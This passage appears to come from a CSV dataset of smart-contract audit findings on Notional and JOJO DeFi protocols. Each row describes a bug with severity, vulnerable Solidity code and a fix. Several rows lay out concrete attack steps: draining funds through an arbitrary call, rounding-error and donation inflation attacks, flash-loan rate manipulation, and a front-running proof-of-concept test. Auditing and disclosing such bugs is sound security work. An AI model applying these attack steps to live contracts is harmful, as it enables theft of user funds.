However, due to a rounding error, it is rounded down to 1%, and the TX will not revert.","Consider increasing the precision.\\nFor instance, increasing the precision from `Constants.PERCENTAGE_DECIMALS` (100) to 1e8 would have caught the issue mentioned earlier in the report even after the rounding down.\\n```\\nnTokenOracleValue.sub(nTokenSpotValue).abs().mul(1e8).div(nTokenOracleValue);\\n((nTokenOracleValue - nTokenSpotValue) * 1e8) / nTokenOracleValue\\n((1,000,000,000 - 980,000,001) * 1e8) / 1,000,000,000\\n(19,999,999 * 1e8) / 1,000,000,000 = 1999999.9 = 1999999\\n```\\n\\n1% of 1e8 = 1000000\\n```\\nrequire(deviationInPercentage <= maxValueDeviationPercent, ""Over Deviation Limit"")\\nrequire(1999999 <= 1000000, ""Over Deviation Limit"") => Revert\\n```\\n","The purpose of the deviation check is to ensure that the spot market value is not manipulated. If the deviation check is not accurate, it might lead to potential manipulation or create the potential for an MEV opportunity due to valuation discrepancy.",```\\nFile: Constants.sol\\n // Basis for percentages\\n int256 internal constant PERCENTAGE_DECIMALS = 100;\\n```\\n +The use of spot data when discounting is subjected to manipulation,medium,"The use of spot data when discounting is subjected to manipulation. As a result, malicious users could receive more cash than expected during redemption by performing manipulation. Since this is a zero-sum, the attacker's gain is the protocol loss.\\nWhen redeeming wfCash before maturity, the `_sellfCash` function will be executed.\\nAssume that there is insufficient fCash left on the wrapper to be sold back to the Notional AMM. In this case, the `getPrincipalFromfCashBorrow` view function will be used to calculate the number of prime cash to be withdrawn for a given fCash amount and sent to the users.\\nNote that the `getPrincipalFromfCashBorrow` view function uses the spot data (spot interest rate, spot utilization, spot totalSupply/totalDebt, etc.) 
internally when computing the prime cash to be withdrawn for a given fCash. Thus, it is subjected to manipulation.\\n```\\nFile: wfCashLogic.sol\\n /// @dev Sells an fCash share back on the Notional AMM\\n function _sellfCash(\\n address receiver,\\n uint256 fCashToSell,\\n uint32 maxImpliedRate\\n ) private returns (uint256 tokensTransferred) {\\n (IERC20 token, bool isETH) = getToken(true); \\n uint256 balanceBefore = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n uint16 currencyId = getCurrencyId(); \\n\\n (uint256 initialCashBalance, uint256 fCashBalance) = getBalances(); \\n bool hasInsufficientfCash = fCashBalance < fCashToSell; \\n\\n uint256 primeCashToWithdraw; \\n if (hasInsufficientfCash) {\\n // If there is insufficient fCash, calculate how much prime cash would be purchased if the\\n // given fCash amount would be sold and that will be how much the wrapper will withdraw and\\n // send to the receiver. Since fCash always sells at a discount to underlying prior to maturity,\\n // the wrapper is guaranteed to have sufficient cash to send to the account.\\n (/* */, primeCashToWithdraw, /* */, /* */) = NotionalV2.getPrincipalFromfCashBorrow( \\n currencyId,\\n fCashToSell, \\n getMaturity(),\\n 0, \\n block.timestamp\\n ); \\n // If this is zero then it signifies that the trade will fail.\\n require(primeCashToWithdraw > 0, ""Redeem Failed""); \\n\\n // Re-write the fCash to sell to the entire fCash balance.\\n fCashToSell = fCashBalance;\\n }\\n```\\n\\nWithin the `CalculationViews.getPrincipalFromfCashBorrow` view function, it will rely on the `InterestRateCurve.calculatefCashTrade` function to compute the cash to be returned based on the current interest rate model.\\nAssume that the current utilization rate is slightly above Kink 1. When Bob redeems his wfCash, the interest rate used falls within the gentle slope between Kink 1 and Kink 2. Let the interest rate based on current utilization be 4%. 
The amount of fCash will be discounted back with 4% interest rate to find out the cash value (present value) and the returned value is $x$.\\nObserved that before Kink 1, the interest rate changed sharply. If one could nudge the utilization toward the left (toward zero) and cause the utilization to fall between Kink 0 and Kink 1, the interest rate would fall sharply. Since the utilization is computed as on `utilization = totalfCash/totalCashUnderlying`, one could deposit prime cash to the market to increase the denominator (totalCashUnderlying) to bring down the utilization rate.\\nBob deposits a specific amount of prime cash (either by its own funds or flash-loan) to reduce the utilization rate, which results in a reduction in interest rate. Assume that the interest rate reduces to 1.5%. The amount of fCash will be discounted with a lower interest rate of 1.5%, which will result in higher cash value, and the returned value/received cash is $y$.\\n$y > x$. So Bob received $y - x$ more cash compared to if he had not performed the manipulation. Since this is a zero-sum, Bob's gain is the protocol loss.\\n",Avoid using spot data when computing the amount of assets that the user is entitled to during redemption. Consider using a TWAP/Time-lagged oracle to guard against potential manipulation.,"Malicious users could receive more cash than expected during redemption by performing manipulation. Since this is a zero-sum, the attacker's gain is the protocol loss.","```\\nFile: wfCashLogic.sol\\n /// @dev Sells an fCash share back on the Notional AMM\\n function _sellfCash(\\n address receiver,\\n uint256 fCashToSell,\\n uint32 maxImpliedRate\\n ) private returns (uint256 tokensTransferred) {\\n (IERC20 token, bool isETH) = getToken(true); \\n uint256 balanceBefore = isETH ? 
WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n uint16 currencyId = getCurrencyId(); \\n\\n (uint256 initialCashBalance, uint256 fCashBalance) = getBalances(); \\n bool hasInsufficientfCash = fCashBalance < fCashToSell; \\n\\n uint256 primeCashToWithdraw; \\n if (hasInsufficientfCash) {\\n // If there is insufficient fCash, calculate how much prime cash would be purchased if the\\n // given fCash amount would be sold and that will be how much the wrapper will withdraw and\\n // send to the receiver. Since fCash always sells at a discount to underlying prior to maturity,\\n // the wrapper is guaranteed to have sufficient cash to send to the account.\\n (/* */, primeCashToWithdraw, /* */, /* */) = NotionalV2.getPrincipalFromfCashBorrow( \\n currencyId,\\n fCashToSell, \\n getMaturity(),\\n 0, \\n block.timestamp\\n ); \\n // If this is zero then it signifies that the trade will fail.\\n require(primeCashToWithdraw > 0, ""Redeem Failed""); \\n\\n // Re-write the fCash to sell to the entire fCash balance.\\n fCashToSell = fCashBalance;\\n }\\n```\\n" +External lending can exceed the threshold,medium,"Due to an incorrect calculation of the max lending amount, external lending can exceed the external withdrawal threshold. If this restriction/threshold is not adhered to, users or various core functionalities within the protocol will have issues redeeming or withdrawing their prime cash.\\nThe following is the extract from the Audit Scope Documentation provided by the protocol team on the contest page that describes the external withdraw threshold:\\n● External Withdraw Threshold: ensures that Notional has sufficient liquidity to withdraw from an external lending market. If Notional has 1000 units of underlying lent out on Aave, it requires 1000 * externalWithdrawThreshold units of underlying to be available on Aave for withdraw. This ensures there is sufficient buffer to process the redemption of Notional funds. 
If available liquidity on Aave begins to drop due to increased utilization, Notional will automatically begin to withdraw its funds from Aave to ensure that they are available for withdrawal on Notional itself.\\nTo ensure the redeemability of Notional's funds on external lending markets, Notional requires there to be redeemable funds on the external lending market that are a multiple of the funds that Notional has lent on that market itself.\\nAssume that the `externalWithdrawThreshold` is 200% and the underlying is USDC. Therefore, `PERCENTAGE_DECIMALS/externalWithdrawThreshold = 100/200 = 0.5` (Line 83-84 below). This means that the number of USDC to be available on AAVE for withdrawal must be two (2) times the number of USDC Notional lent out on AAVE (A multiple of 2).\\nThe `externalUnderlyingAvailableForWithdraw` stores the number of liquidity in USDC on the AAVE pool available to be withdrawn.\\nIf `externalUnderlyingAvailableForWithdraw` is 1000 USDC and `currentExternalUnderlyingLend` is 400 USDC, this means that the remaining 600 USDC liquidity on the AAVE pool is not owned by Notional.\\nThe `maxExternalUnderlyingLend` will be `600 * 0.5 = 300`. 
Thus, the maximum amount that Notional can lend externally at this point is 300 USDC.\\nAssume that after Notional has lent 300 USDC externally to the AAVE pool.\\nThe `currentExternalUnderlyingLend` will become `400+300=700`, and the `externalUnderlyingAvailableForWithdraw` will become `1000+300=1300`\\nFollowing is the percentage of USDC in AAVE that belong to Notional\\n```\\n700/1300 = 0.5384615385 (53%).\\n```\\n\\nAt this point, the invariant is broken as the number of USDC to be available on AAVE for withdrawal is less than two (2) times the number of USDC lent out on AAVE after the lending.\\n```\\nFile: ExternalLending.sol\\n function getTargetExternalLendingAmount(\\n..SNIP..\\n uint256 maxExternalUnderlyingLend;\\n if (oracleData.currentExternalUnderlyingLend < oracleData.externalUnderlyingAvailableForWithdraw) {\\n maxExternalUnderlyingLend =\\n (oracleData.externalUnderlyingAvailableForWithdraw - oracleData.currentExternalUnderlyingLend)\\n .mul(uint256(Constants.PERCENTAGE_DECIMALS))\\n .div(rebalancingTargetData.externalWithdrawThreshold);\\n } else {\\n maxExternalUnderlyingLend = 0;\\n }\\n```\\n\\nThe root cause is that when USDC is deposited to AAVE to get aUSDC, the total USDC in the pool increases. 
Therefore, using the current amount of USDC in the pool to determine the maximum deposit amount is not an accurate measure of liquidity risk.","To ensure that a deposit does not exceed the threshold, the following formula should be used to determine the maximum deposit amount:\\nLet's denote:\\n$T$ as the externalWithdrawThreshold $L$ as the currentExternalUnderlyingLend $W$ as the externalUnderlyingAvailableForWithdraw $D$ as the Deposit (the variable we want to solve for)\\n$$ T = \\frac{L + D}{W + D} $$\\nSolving $D$, the formula for calculating the maximum deposit ($D$) is\\n$$ D = \\frac{TW-L}{1-T} $$\\nUsing back the same example in the ""Vulnerability Detail"" section.\\nThe maximum deposit amount is as follows:\\n```\\nD = (TW - L) / (1 - T)\\nD = (0.5 * 1000 - 400) / (1 - 0.5)\\nD = (500 - 400) / 0.5 = 200\\n```\\n\\nIf 200 USDC is lent out, it will still not exceed the threshold of 200%, which demonstrates that the formula is working as intended in keeping the multiple of two (200%) constant before and after the deposit.\\n```\\n(400 + 200) / (1000 + 200) = 0.5\\n```\\n","To ensure the redeemability of Notional's funds on external lending markets, Notional requires there to be redeemable funds on the external lending market that are a multiple of the funds that Notional has lent on that market itself.\\nIf this restriction is not adhered to, users or various core functionalities within the protocol will have issues redeeming or withdrawing their prime cash. 
For instance, users might not be able to withdraw their assets from the protocol due to insufficient liquidity, or liquidation cannot be carried out due to lack of liquidity, resulting in bad debt accumulating within the protocol and negatively affecting the protocol's solvency.",```\\n700/1300 = 0.5384615385 (53%).\\n```\\n +Rebalance will be delayed due to revert,medium,"The rebalancing of unhealthy currencies will be delayed due to a revert, resulting in an excess of liquidity being lent out in the external market. This might affect the liquidity of the protocol, potentially resulting in withdrawal or liquidation having issues executed due to insufficient liquidity.\\nAssume that Notional supports 5 currencies ($A, B, C, D, E$), and the Gelato bot is configured to call the `checkRebalance` function every 30 minutes.\\nAssume that the current market condition is volatile. Thus, the inflow and outflow of assets to Notional, utilization rate, and available liquidity at AAVE change frequently. As a result, the target amount that should be externally lent out also changes frequently since the computation of this value relies on the spot market information.\\nAt T1, when the Gelato bot calls the `checkRebalance()` view function, it returns that currencies $A$, $B$, and $C$ are unhealthy and need to be rebalanced.\\nShortly after receiving the execution payload from the `checkRebalance()`, the bot submits the rebalancing TX to the mempool for execution at T2.\\nWhen the rebalancing TX is executed at T3, one of the currencies (Currency $A$) becomes healthy. As a result, the require check at Line 326 will revert and the entire rebalancing transaction will be cancelled. 
Thus, currencies $B$ and $C$ that are still unhealthy at this point will not be rebalanced.\\nIf this issue occurs frequently or repeatedly over a period of time, the rebalancing of unhealthy currencies will be delayed.\\n```\\nFile: TreasuryAction.sol\\n function _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the rebalancing targets\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy); \\n```\\n","If one of the currencies becomes healthy when the rebalance TX is executed, consider skipping this currency and move on to execute the rebalance on the rest of the currencies that are still unhealthy.\\n```\\nfunction _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the 
rebalancing targets\\n// Remove the line below\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy);\\n// Add the line below\\n if (useCooldownCheck && !hasCooldownPassed && !isExternalLendingUnhealthy) return;\\n```\\n","The rebalancing of unhealthy currencies will be delayed, resulting in an excess of liquidity being lent out to the external market. This might affect the liquidity of the protocol, potentially resulting in withdrawal or liquidation having issues executed due to insufficient liquidity.","```\\nFile: TreasuryAction.sol\\n function _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the rebalancing targets\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy); \\n```\\n" +Rebalance might be skipped even if the external lending is unhealthy,medium,"The deviation between the target and current lending amount (offTargetPercentage) will be underestimated due to incorrect calculation. 
As a result, a rebalancing might be skipped even if the existing external lending is unhealthy.\\nThe formula used within the `_isExternalLendingUnhealthy` function below calculating the `offTargetPercentage` can be simplified as follows for the readability of this issue.\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{currentExternalUnderlyingLend + targetAmount} \\times 100% $$\\nAssume that the `targetAmount` is 100 and `currentExternalUnderlyingLend` is 90. The off-target percentage will be 5.26%, which is incorrect.\\n```\\noffTargetPercentage = abs(90 - 100) / (100 + 90) = 10 / 190 = 0.0526 = 5.26%\\n```\\n\\nThe correct approach is to calculate the off-target percentages as a ratio of the difference to the target:\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{targetAmount} \\times 100% $$\\n```\\noffTargetPercentage = abs(90 - 100) / (100) = 10 / 100 = 0.1 = 10%\\n```\\n\\n```\\nFile: TreasuryAction.sol\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n oracleData = oracle.getOracleData(); \\n\\n RebalancingTargetData memory rebalancingTargetData =\\n LibStorage.getRebalancingTargets()[currencyId][oracleData.holding]; \\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId); \\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId); \\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n ); \\n\\n if (oracleData.currentExternalUnderlyingLend == 0) { \\n // If this is zero then there is no outstanding lending.\\n isExternalLendingUnhealthy = false; \\n } else {\\n uint256 offTargetPercentage = oracleData.currentExternalUnderlyingLend.toInt() 
.sub(targetAmount.toInt()).abs()\\n .toUint()\\n .mul(uint256(Constants.PERCENTAGE_DECIMALS))\\n .div(targetAmount.add(oracleData.currentExternalUnderlyingLend)); \\n \\n // prevent rebalance if change is not greater than 1%, important for health check and avoiding triggering\\n // rebalance shortly after rebalance on minimum change\\n isExternalLendingUnhealthy = \\n (targetAmount < oracleData.currentExternalUnderlyingLend) && (offTargetPercentage > 0); \\n }\\n }\\n```\\n",Consider calculating the off-target percentages as a ratio of the difference to the target:\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{targetAmount} \\times 100% $$,"The deviation between the target and current lending amount (offTargetPercentage) will be underestimated by approximately half the majority of the time. As a result, a rebalance intended to remediate the unhealthy external lending might be skipped since the code incorrectly assumes that it has not hit the off-target percentage. External lending beyond the target will affect the liquidity of the protocol, potentially resulting in withdrawal or liquidation, having issues executed due to insufficient liquidity.",```\\noffTargetPercentage = abs(90 - 100) / (100 + 90) = 10 / 190 = 0.0526 = 5.26%\\n```\\n +All funds can be stolen from JOJODealer,high,"`Funding._withdraw()` makes arbitrary call with user specified params. 
User can for example make ERC20 to himself and steal funds.\\nUser can specify parameters `param` and `to` when withdraws:\\n```\\n function executeWithdraw(address from, address to, bool isInternal, bytes memory param) external nonReentrant {\\n Funding.executeWithdraw(state, from, to, isInternal, param);\\n }\\n```\\n\\nIn the end of `_withdraw()` function address `to` is called with that bytes param:\\n```\\n function _withdraw(\\n Types.State storage state,\\n address spender,\\n address from,\\n address to,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isInternal,\\n bytes memory param\\n )\\n private\\n {\\n // rest of code\\n\\n if (param.length != 0) {\\n require(Address.isContract(to), ""target is not a contract"");\\n (bool success,) = to.call(param);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n }\\n }\\n```\\n\\nAs an attack vector attacker can execute withdrawal of 1 wei to USDC contract and pass calldata to transfer arbitrary USDC amount to himself via USDC contract.",Don't make arbitrary call with user specified params,All funds can be stolen from JOJODealer,"```\\n function executeWithdraw(address from, address to, bool isInternal, bytes memory param) external nonReentrant {\\n Funding.executeWithdraw(state, from, to, isInternal, param);\\n }\\n```\\n" +FundingRateArbitrage contract can be drained due to rounding error,high,"In the `requestWithdraw`, rounding in the wrong direction is done which can lead to contract being drained.\\nIn the `requestWithdraw` function in `FundingRateArbitrage`, we find the following lines of code:\\n```\\njusdOutside[msg.sender] -= repayJUSDAmount;\\nuint256 index = getIndex();\\nuint256 lockedEarnUSDCAmount = jusdOutside[msg.sender].decimalDiv(index);\\nrequire(\\n earnUSDCBalance[msg.sender] >= lockedEarnUSDCAmount, ""lockedEarnUSDCAmount is bigger than 
earnUSDCBalance""\\n);\\nwithdrawEarnUSDCAmount = earnUSDCBalance[msg.sender] - lockedEarnUSDCAmount;\\n```\\n\\nBecause we round down when calculating `lockedEarnUSDCAmount`, `withdrawEarnUSDCAmount` is higher than it should be, which leads to us allowing the user to withdraw more than we should allow them to given the amount of JUSD they repaid.\\nThe execution of this is a bit more complicated, let's go through an example. We will assume there's a bunch of JUSD existing in the contract and the attacker is the first to deposit.\\nSteps:\\nThe attacker deposits `1` unit of USDC and then manually sends in another 100 * 10^6 - `1` (not through deposit, just a transfer). The share price / price per earnUSDC will now be $100. Exactly one earnUSDC is in existence at the moment.\\nNext the attacker creates a new EOA and deposits a little over $101 worth of USDC (so that after fees we can get to the $100), giving one earnUSDC to the EOA. The attacker will receive around $100 worth of `JUSD` from doing this.\\nAttacker calls `requestWithdraw` with `repayJUSDAmount` = `1` with the second newly created EOA\\n`lockedEarnUSDCAmount` is rounded down to 0 (since `repayJUSDAmount` is subtracted from jusdOutside[msg.sender]\\n`withdrawEarnUSDCAmount` will be `1`\\nAfter `permitWithdrawRequests` is called, attacker will be able to withdraw the $100 they deposited through the second EOA (granted, they lost the deposit and withdrawal fees) while only having sent `1` unit of `JUSD` back. 
This leads to massive profit for the attacker.\\nAttacker can repeat steps 2-6 constantly until the contract is drained of JUSD.",Round up instead of down,All JUSD in the contract can be drained,"```\\njusdOutside[msg.sender] -= repayJUSDAmount;\\nuint256 index = getIndex();\\nuint256 lockedEarnUSDCAmount = jusdOutside[msg.sender].decimalDiv(index);\\nrequire(\\n earnUSDCBalance[msg.sender] >= lockedEarnUSDCAmount, ""lockedEarnUSDCAmount is bigger than earnUSDCBalance""\\n);\\nwithdrawEarnUSDCAmount = earnUSDCBalance[msg.sender] - lockedEarnUSDCAmount;\\n```\\n" +"`JUSDBankStorage::getTRate()`,`JUSDBankStorage::accrueRate()` are calculated differently, and the data calculation is biased, Causes the `JUSDBank` contract funciton result to be incorrect",medium,"```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR + 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return tRate + (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n }\\n```\\n\\nJUSDBankStorage::getTRate(),JUSDBankStorage::accrueRate() are calculated differently, and the data calculation is biased, resulting in the JUSDBank contract not being executed correctly\\nThe wrong result causes the funciton calculation results of `JUSDBank::_isAccountSafe()`, `JUSDBank::flashLoan()`, `JUSDBank::_handleBadDebt`, etc. 
to be biased,and all functions that call the relevant function will be biased",Use the same calculation formula:\\n```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp // Remove the line below\\n uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR // Add the line below\\n 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp // Remove the line below\\n uint256(lastUpdateTimestamp);\\n// Remove the line below\\n return tRate // Add the line below\\n (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n// Add the line below\\n return tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR // Add the line below\\n 1e18);\\n }\\n```\\n,Causes the `JUSDBank` contract function result to be incorrect,```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR + 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return tRate + (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n }\\n```\\n +Funding#requestWithdraw uses incorrect withdraw address,medium,"When requesting a withdraw, `msg.sender` is used in place of the `from` address. This means that withdraws cannot be initiated on behalf of other users. 
This will break integrations that depend on this functionality leading to irretrievable funds.\\nFunding.sol#L69-L82\\n```\\nfunction requestWithdraw(\\n Types.State storage state,\\n address from,\\n uint256 primaryAmount,\\n uint256 secondaryAmount\\n)\\n external\\n{\\n require(isWithdrawValid(state, msg.sender, from, primaryAmount, secondaryAmount), Errors.WITHDRAW_INVALID);\\n state.pendingPrimaryWithdraw[msg.sender] = primaryAmount;\\n state.pendingSecondaryWithdraw[msg.sender] = secondaryAmount;\\n state.withdrawExecutionTimestamp[msg.sender] = block.timestamp + state.withdrawTimeLock;\\n emit RequestWithdraw(msg.sender, primaryAmount, secondaryAmount, state.withdrawExecutionTimestamp[msg.sender]);\\n}\\n```\\n\\nAs shown above the withdraw is accidentally queue to `msg.sender` NOT the `from` address. This means that all withdraws started on behalf of another user will actually trigger a withdraw `from` the `operator`. The result is that withdraw cannot be initiated on behalf of other users, even if the allowance is set properly, leading to irretrievable funds",Change all occurrences of `msg.sender` in stage changes to `from` instead.,Requesting withdraws for other users is broken and strands funds,"```\\nfunction requestWithdraw(\\n Types.State storage state,\\n address from,\\n uint256 primaryAmount,\\n uint256 secondaryAmount\\n)\\n external\\n{\\n require(isWithdrawValid(state, msg.sender, from, primaryAmount, secondaryAmount), Errors.WITHDRAW_INVALID);\\n state.pendingPrimaryWithdraw[msg.sender] = primaryAmount;\\n state.pendingSecondaryWithdraw[msg.sender] = secondaryAmount;\\n state.withdrawExecutionTimestamp[msg.sender] = block.timestamp + state.withdrawTimeLock;\\n emit RequestWithdraw(msg.sender, primaryAmount, secondaryAmount, state.withdrawExecutionTimestamp[msg.sender]);\\n}\\n```\\n" +FundRateArbitrage is vulnerable to inflation attacks,medium,"When index is calculated, it is figured by dividing the net value of the contract (including USDC 
held) by the current supply of earnUSDC. Through deposit and donation this ratio can be inflated. Then when others deposit, their deposit can be taken almost completely via rounding.\\nFundingRateArbitrage.sol#L98-L104\\n```\\nfunction getIndex() public view returns (uint256) {\\n if (totalEarnUSDCBalance == 0) {\\n return 1e18;\\n } else {\\n return SignedDecimalMath.decimalDiv(getNetValue(), totalEarnUSDCBalance);\\n }\\n}\\n```\\n\\nIndex is calculated is by dividing the net value of the contract (including USDC held) by the current supply of totalEarnUSDCBalance. This can be inflated via donation. Assume the user deposits 1 share then donates 100,000e6 USDC. The exchange ratio is now 100,000e18 which causes issues during deposits.\\nFundingRateArbitrage.sol#L258-L275\\n```\\nfunction deposit(uint256 amount) external {\\n require(amount != 0, ""deposit amount is zero"");\\n uint256 feeAmount = amount.decimalMul(depositFeeRate);\\n if (feeAmount > 0) {\\n amount -= feeAmount;\\n IERC20(usdc).transferFrom(msg.sender, owner(), feeAmount);\\n }\\n uint256 earnUSDCAmount = amount.decimalDiv(getIndex());\\n IERC20(usdc).transferFrom(msg.sender, address(this), amount);\\n JOJODealer(jojoDealer).deposit(0, amount, msg.sender);\\n earnUSDCBalance[msg.sender] += earnUSDCAmount;\\n jusdOutside[msg.sender] += amount;\\n totalEarnUSDCBalance += earnUSDCAmount;\\n require(getNetValue() <= maxNetValue, ""net value exceed limitation"");\\n uint256 quota = maxUsdcQuota[msg.sender] == 0 ? defaultUsdcQuota : maxUsdcQuota[msg.sender];\\n require(earnUSDCBalance[msg.sender].decimalMul(getIndex()) <= quota, ""usdc amount bigger than quota"");\\n emit DepositToHedging(msg.sender, amount, feeAmount, earnUSDCAmount);\\n}\\n```\\n\\nNotice earnUSDCAmount is amount / index. 
With the inflated index that would mean that any deposit under 100,000e6 will get zero shares, making it exactly like the standard ERC4626 inflation attack.",Use a virtual offset as suggested by OZ for their ERC4626 contracts,Subsequent user deposits can be stolen,"```\\nfunction getIndex() public view returns (uint256) {\\n if (totalEarnUSDCBalance == 0) {\\n return 1e18;\\n } else {\\n return SignedDecimalMath.decimalDiv(getNetValue(), totalEarnUSDCBalance);\\n }\\n}\\n```\\n" +"Lender transactions can be front-run, leading to lost funds",high,"Users can mint wfCash tokens via `mintViaUnderlying` by passing a variable `minImpliedRate` to guard against trade slippage. If the market interest is lower than expected by the user, the transaction will revert due to slippage protection. However, if the user mints a share larger than maxFCash, the `minImpliedRate` check is not performed.\\n```\\n function mintViaUnderlying(\\n uint256 depositAmountExternal,\\n uint88 fCashAmount,\\n address receiver,\\n uint32 minImpliedRate//@audit when lendAmount bigger than maxFCash lack of minRate protect.\\n ) external override {\\n (/* */, uint256 maxFCash) = getTotalFCashAvailable();\\n _mintInternal(depositAmountExternal, fCashAmount, receiver, minImpliedRate, maxFCash);\\n }\\n```\\n\\n```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);//@audit-info fCashAmount * (underlyingTokenDecimals) / 1e8\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);//@audit check this.\\n } \\n```\\n\\nImagine the following scenario:\\nlender deposit Underlying token to `mint` some shares and set a `minImpliedRate` to protect the trsanction\\nalice front-run her 
transaction invoke `mint` to `mint` some share\\nthe shares of lender `mint` now is bigger than `maxFCash`\\nnow the lender `lending at zero`\\n```\\n function testDepositViaUnderlying() public {\\n address alice = makeAddr(""alice"");\\n deal(address(asset), LENDER, 8800 * precision, true);\\n deal(address(asset), alice, 5000 * precision, true);\\n\\n //alice deal.\\n vm.stopPrank();\\n vm.startPrank(alice);\\n asset.approve(address(w), type(uint256).max);\\n \\n //==============================LENDER START=============================//\\n vm.stopPrank();\\n vm.startPrank(LENDER);\\n asset.approve(address(w), type(uint256).max);\\n //user DAI balance before:\\n assertEq(asset.balanceOf(LENDER), 8800e18);\\n\\n (/* */, uint256 maxFCash) = w.getTotalFCashAvailable();\\n console2.log(""current maxFCash:"",maxFCash);\\n\\n //LENDER mintViaUnderlying will revert due to slippage.\\n uint32 minImpliedRate = 0.15e9;\\n vm.expectRevert(""Trade failed, slippage"");\\n w.mintViaUnderlying(5000e18,5000e8,LENDER,minImpliedRate);\\n //==============================LENDER END=============================//\\n\\n //======================alice frontrun to mint some shares.============//\\n vm.stopPrank();\\n vm.startPrank(alice);\\n w.mint(5000e8,alice);\\n\\n //==========================LENDER TX =================================//\\n vm.stopPrank();\\n vm.startPrank(LENDER);\\n asset.approve(address(w), type(uint256).max);\\n //user DAI balance before:\\n assertEq(asset.balanceOf(LENDER), 8800e18);\\n\\n //LENDER mintViaUnderlying will success.\\n w.mintViaUnderlying(5000e18,5000e8,LENDER,minImpliedRate);\\n\\n console2.log(""lender mint token:"",w.balanceOf(LENDER));\\n console2.log(""lender cost DAI:"",8800e18 - asset.balanceOf(LENDER));\\n }\\n```\\n\\nFrom the above test, we can observe that if `maxFCasha` is greater than `5000e8`, the lender's 